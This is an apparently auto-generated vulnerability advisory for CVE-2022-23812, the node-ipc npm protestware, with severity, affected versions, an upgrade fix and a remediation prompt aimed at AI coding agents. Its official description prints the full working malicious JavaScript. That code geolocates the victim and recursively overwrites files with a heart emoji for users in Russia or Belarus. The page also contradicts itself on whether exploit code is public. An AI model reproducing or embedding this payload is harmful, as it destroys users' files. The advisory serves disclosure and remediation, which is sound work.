# CVE-2022-23812: Malicious Package

> Malicious code in the node-ipc npm package overwrites files with a heart emoji for users in Russia or Belarus.

- **Severity:** Critical 9.8 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H`)
- **Exploited in the wild:** Not known
- **Login needed:** Not needed
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 16 Mar 2022
- **Updated:** 16 Sep 2024
- **Also known as:** GHSA-97m3-w2cp-4xx6

## What is CVE-2022-23812?

CVE-2022-23812 is a critical vulnerability in node-ipc, published on 16 Mar 2022. An attacker can exploit it over the internet without logging in, with no action from the victim.

### Official description

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

## Which versions are affected by CVE-2022-23812?

2 open source packages ship an affected version, including node-ipc. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `node-ipc` | npm | From 10.1.1 | 10.1.3 |
| `node-ipc` | npm | From 10.1.1 | 10.1.3 |

Products: Node-Ipc Project Node-Ipc.

## How do I fix CVE-2022-23812?

Upgrade node-ipc to 10.1.3 or later.

## Is CVE-2022-23812 being exploited?

There is no known exploitation of CVE-2022-23812 in the wild and no public exploit code.

Public exploit code:

- node-ipc is malware / protestware! (github_poc): https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2022-23812 and fix it if it is affected.

What it is: CVE-2022-23812 is a critical vulnerability in node-ipc, published on 16 Mar 2022. An attacker can exploit it over the internet without logging in, with no action from the victim.
Exploitation: There is no known exploitation of CVE-2022-23812 in the wild and no public exploit code.

Affected packages and fixed versions:
- node-ipc (npm): affected from 10.1.1; fixed in 10.1.3
- node-ipc (npm): affected from 10.1.1; fixed in 10.1.3

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2022-23812/ (Markdown: https://insights.sbomify.com/CVE-2022-23812/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2022-23812
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-23812
- OSV: https://osv.dev/vulnerability/CVE-2022-23812

---
From sbomify Insights: https://insights.sbomify.com/CVE-2022-23812/
Summaries are generated and may contain mistakes; the official description above is the record.
